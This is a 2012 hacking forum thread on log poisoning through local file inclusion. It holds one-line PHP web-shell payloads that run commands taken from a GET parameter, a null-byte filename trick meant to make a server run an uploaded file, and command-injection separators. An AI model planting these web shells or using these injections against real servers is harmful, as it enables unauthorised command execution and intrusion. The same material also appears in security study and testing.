Jump to content


Photo
- - - - -

local file inclusion, log injection


  • Please log in to reply
3 replies to this topic

#1 I8igmac

I8igmac

    I broke 10 posts and all I got was this lousy title!

  • Members
  • 14 posts
  • Gender:Male

Posted 06 August 2012 - 12:10 AM

So I'm working on a project I plan to share once I have everything orginized... There are a lot of tutorials out there but none have covered all senario's

What if log poisoning is possible but your typical <?php passthu();?> does not work...
What other methods can we attempt to achieve command execution...

So what else can we write to this log, Perl? Python? Ruby? java?

#2 tekio

tekio

    5(R1P7 |<1DD13

  • Binrev Financier
  • 1,082 posts
  • Gender:Male
  • Location:The Blue Nowhere

Posted 06 August 2012 - 03:04 AM

So I'm working on a project I plan to share once I have everything orginized... There are a lot of tutorials out there but none have covered all senario's

What if log poisoning is possible but your typical <?php passthu();?> does not work...
What other methods can we attempt to achieve command execution...

So what else can we write to this log, Perl? Python? Ruby? java?



Here are some links that should prove useful:
https://www.golemtec...mmand-injection
http://www.blackhatl...mmand_Injection


Common practice is to find use simple "fuzzing" techniques on public domain script and "inurl:" searches with google or bing.


It's really easy to write a PERL script looking for common vulns.

PERL you want to look for stuff like:
open()
system()
exec()

Anything that passes commands to the operating system, uploads anything. Or even writes to - and names a file. For example, if a script writes form data to a text file.... Then names the file something like <user name>.txt, you could try creating a user named pwner&#046php&#03700. If encoded and terminates reading it with a null string, it might execute. When the file is written, and decoded it would be: pwner.php%00.txt.


To execute from commands for POST and GET requests, it's common to use ";" "&&" "|", or even an encoded version of each. Anything that will properly execute additional commands. Kind of like a union select statement and commenting out the rest of the old SQL in MySQLi attacks.

#3 VMw4r3

VMw4r3

    the 0ne

  • Members
  • 1 posts
  • Gender:Male

Posted 26 August 2012 - 11:12 AM

   <?php system($_GET['cmd']); ?>
   <?php exec($_GET['cmd']); ?> 
   <?php shell_exec($_GET['cmd']); ?>
   <?php passthru($_GET['cmd']); ?>

Or you could try using Fimap.py

http://code.google.com/p/fimap/

#4 systems_glitch

systems_glitch

    Dangerous free thinker

  • Moderating Team
  • 1,623 posts
  • Gender:Male

Posted 27 August 2012 - 08:41 AM

If searching for Ruby vulns, try and find anywhere `eval` is being used. Eval sends a string as a message to another object for creating dynamic code -- really useful, but really dangerous if you let unsanitized strings in. Also, apparently the ActiveRecord `order` method is vulnerable to SQL injection...so if that's being populated with a POST or GET, you can inject on it.

We've ran into both of these at work.




BinRev is hosted by the great people at Lunarpages!